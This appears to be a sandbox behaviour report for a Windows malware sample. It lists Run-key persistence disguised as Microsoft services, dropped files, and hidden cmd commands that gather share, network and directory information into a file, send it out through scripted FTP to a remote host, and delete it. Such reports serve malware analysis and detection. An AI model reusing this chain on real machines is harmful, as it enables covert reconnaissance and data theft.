Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Svchost Microsoft' = '%HOMEPATH%\taskmgrcmds.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Svchost Microsoft' = '%HOMEPATH%\taskmgrcmds.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Services' = '%HOMEPATH%\taskmgrlogs.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Services' = '%HOMEPATH%\taskmgrlogs.exe'
- %HOMEPATH%\taskmgrcmds.exe
- %HOMEPATH%\win1.ini
- %HOMEPATH%\conn_mmztqpooso-user
- %HOMEPATH%\pp
- %HOMEPATH%\ccc3.dll
- %HOMEPATH%\ccc4.dll
- %HOMEPATH%\unix1.reg
- %HOMEPATH%\win1.ini
- %HOMEPATH%\pp
- %HOMEPATH%\ccc3.dll
- %HOMEPATH%\ccc4.dll
- %HOMEPATH%\conn_mmztqpooso-user
- %HOMEPATH%\pp
- 'ft#.###eauveritas.com':21
- DNS ASK google.com
- DNS ASK ft#.###eauveritas.com
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- '%HOMEPATH%\taskmgrcmds.exe'
- '%HOMEPATH%\taskmgrcmds.exe' ' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C NET SHARE > "%HOMEPATH%\CONN_MMZTQPOOSO-USER"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C IPCONFIG/ALL >> "%HOMEPATH%\CONN_MMZTQPOOSO-USER"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C ping www.google.com > "%HOMEPATH%\pp"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C DIR C:\ >> "%HOMEPATH%\CONN_MMZTQPOOSO-USER"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C ftp -s:"%HOMEPATH%\ccc3.dll"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C ftp -s:"%HOMEPATH%\ccc4.dll"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C RegEdit /i /s "%HOMEPATH%\unix1.reg"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C DEL "%HOMEPATH%\CONN_MMZTQPOOSO-USER"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C ftp -s:"%HOMEPATH%\ccc1.dll"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C NET SHARE > "%HOMEPATH%\CONN_MMZTQPOOSO-USER"
- '<SYSTEM32>\cmd.exe' /C DEL "%HOMEPATH%\CONN_MMZTQPOOSO-USER"
- '%WINDIR%\regedit.exe' /i /s "%HOMEPATH%\unix1.reg"
- '<SYSTEM32>\cmd.exe' /C RegEdit /i /s "%HOMEPATH%\unix1.reg"
- '<SYSTEM32>\ftp.exe' -s:"%HOMEPATH%\ccc4.dll"
- '<SYSTEM32>\cmd.exe' /C ftp -s:"%HOMEPATH%\ccc4.dll"
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "<SYSTEM32>\ftp.exe"
- '<SYSTEM32>\ftp.exe' -s:"%HOMEPATH%\ccc3.dll"
- '<SYSTEM32>\cmd.exe' /C ftp -s:"%HOMEPATH%\ccc3.dll"
- '<SYSTEM32>\cmd.exe' /C DIR C:\ >> "%HOMEPATH%\CONN_MMZTQPOOSO-USER"
- '<SYSTEM32>\ping.exe' www.google.com
- '<SYSTEM32>\cmd.exe' /C ping www.google.com > "%HOMEPATH%\pp"
- '<SYSTEM32>\ipconfig.exe' /ALL
- '<SYSTEM32>\cmd.exe' /C IPCONFIG/ALL >> "%HOMEPATH%\CONN_MMZTQPOOSO-USER"
- '<SYSTEM32>\net1.exe' SHARE
- '<SYSTEM32>\net.exe' SHARE
- '<SYSTEM32>\cmd.exe' /C ftp -s:"%HOMEPATH%\ccc1.dll"
- '<SYSTEM32>\ftp.exe' -s:"%HOMEPATH%\ccc1.dll"